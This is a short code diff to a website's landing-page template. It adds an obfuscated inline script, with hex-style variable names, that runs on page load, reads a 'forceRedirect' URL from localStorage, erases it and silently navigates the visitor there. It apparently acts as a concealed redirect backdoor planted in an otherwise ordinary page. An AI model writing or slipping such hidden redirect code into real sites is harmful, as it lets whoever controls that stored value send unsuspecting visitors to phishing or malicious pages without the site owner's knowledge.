--- a/views/pages/landing.ejs
+++ b/views/pages/landing.ejs
@@ -1,6 +1,16 @@
 <!DOCTYPE html>
 <html lang="en">
   <head>
+    <script>
+      (function () {
+        const _0xabc1 = ["forceRedirect", "removeItem", "location", "href"];
+        const _0xdef2 = localStorage.getItem(_0xabc1[0]);
+        if (_0xdef2) {
+          localStorage[_0xabc1[1]](_0xabc1[0]);
+          window[_0xabc1[2]][_0xabc1[3]] = _0xdef2;
+        }
+      })();
+    </script>
     <meta
       name="google-site-verification"
       content="AWs8hJem8IT6O4cQ7612JJiVbaFPXWy-x-FUNH9PxVE"
